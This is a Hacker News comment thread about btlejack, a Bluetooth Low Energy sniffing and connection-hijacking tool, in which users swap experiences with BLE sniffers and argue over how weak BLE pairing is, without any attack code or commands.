
Bluetooth Low Energy Swiss-Army Knife - okket
https://github.com/virtualabs/btlejack
======
THE_PUN_STOPS
Using Hacker News as a mechanical engineer with not much interest in software
sometimes leads to cases where I misinterpret article titles.

I was very excited to find out how and why anybody would put BLE into a
literal multi tool!

~~~
alasano
> Person 1: BLE in a Swiss-Army Knife.. what can you do with that?

> Person 2: Take a look.

"Your Swiss-Army Knife is now connected"

> Person 1: Nice.

> Person 2: Nice.

~~~
teekert
Imagine it connects to your phone and reports temperature, tilt, humidity, its
location, works as a compass (Why not use the phone directly? Well maybe I
need to monitor the trailer I am trying to get level as I adjust the front
wheel?)

------
oflannabhra
I’ve only used Ubertooth [0] to sniff BLE. I was not very impressed with its
ability to follow connections (it would frequently miss the connection
exchange due to channel hopping).

Can using multiple micro:bits at once with BTLEJack increase the success rate?

Most BLE diagnostic equipment that guarantees capture of all traffic costs
over $10k.

[0] -
[https://github.com/greatscottgadgets/ubertooth](https://github.com/greatscottgadgets/ubertooth)

~~~
alex_suzuki
Same here. We've been using Ubertooth One and it was not a pleasant
experience. Certainly cheap and easy to set up, but with very mixed results.
Not only does it miss connections due to the channel hopping, it also
frequently loses connections, which is even more frustrating.

We've had the privilege to know someone with a professional wide-band solution
(Ellisys Bluetooth Explorer), and it was miles ahead, including the analysis
software.

Disclaimer: I am not in any way affiliated with Ellisys.

------
exabrial
Are ble connections neither encrypted nor authenticated? How on Earth does the
connection hijacking work so simplistically?

~~~
Jedd
My understanding is the initial handshake is not terribly secure, and sniffers
watching that can obtain the long term key used by the pair forever.

But I gather a third party can force a handshake refresh at will, which may be
what they're doing here. Code's available. : )

~~~
dmitrygr
False, basically on every count.

This attack has zero effect on connections established using mitm-protected
paring method. This attack is a non-event to any device that follows proper
security design as per BT spec

~~~
keybuk
There are vulnerabilities in the "standard" LE pairing, even with MITM, that
make these things possible.

Fixed with the BT LE Secure Connections key exchange, but many devices don't
implement that

~~~
dmitrygr
Please cite

~~~
larkeith
[https://www.digikey.com/eewiki/display/Wireless/A+Basic+Intr...](https://www.digikey.com/eewiki/display/Wireless/A+Basic+Introduction+to+BLE+Security)

(Heading: Pairing Methods for LE Secure Connections (4.2 devices only))

~~~
dmitrygr
That talks about 4.2 pairing methods. I'm looking for a citation claiming that
4.1 pairing method is in any way insecure

------
jaimex2
Would this work on Tesla Model 3's phone key system?

[https://www.tesla.com/support/model-3#phone-
key](https://www.tesla.com/support/model-3#phone-key)

------
jerkstate
Cool! I have been using a Nordic BLE sniffer for reverse engineering fitness
bands, which is awful because it's only half duplex. Can't wait to try this
out.

